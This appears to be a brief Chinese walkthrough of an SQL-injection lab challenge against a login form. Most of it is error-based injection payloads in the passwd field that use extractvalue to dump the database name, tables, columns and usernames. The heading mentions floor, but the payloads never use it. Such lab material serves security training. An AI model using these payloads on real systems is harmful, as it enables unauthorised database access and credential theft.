目录
判断注入类型
用户密码随便输入不正确的
输入正确的用户名和密码
两者显示信息不同
抓包进行尝试闭合方式和注释方式
和正确的页面响应相同,说明注释和闭合方式正确
解题方式一:使用报错函数floor:
显示数据库
uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select database()),0x7e)) --+&submit=Submit
显示数据表:
uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select (table_name)from
information_schema.tables where table_schema=database() limit 2,1),0x7e)) --+&submit=Submit
显示表下字段:
uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select (column_name)from
information_schema.columns where table_name='users' limit 1,1),0x7e)) --+&submit=Submit
显示字段具体值:
uname=admin&passwd=-admin" or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) --+&submit=Submit